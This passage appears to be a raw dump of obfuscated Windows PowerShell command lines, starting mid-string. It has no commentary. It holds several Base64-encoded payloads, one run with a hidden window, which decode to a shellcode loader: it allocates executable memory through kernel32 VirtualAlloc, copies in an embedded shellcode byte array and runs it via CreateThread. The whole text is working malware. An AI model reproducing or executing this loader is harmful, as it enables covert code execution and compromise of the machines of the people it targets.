wAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7A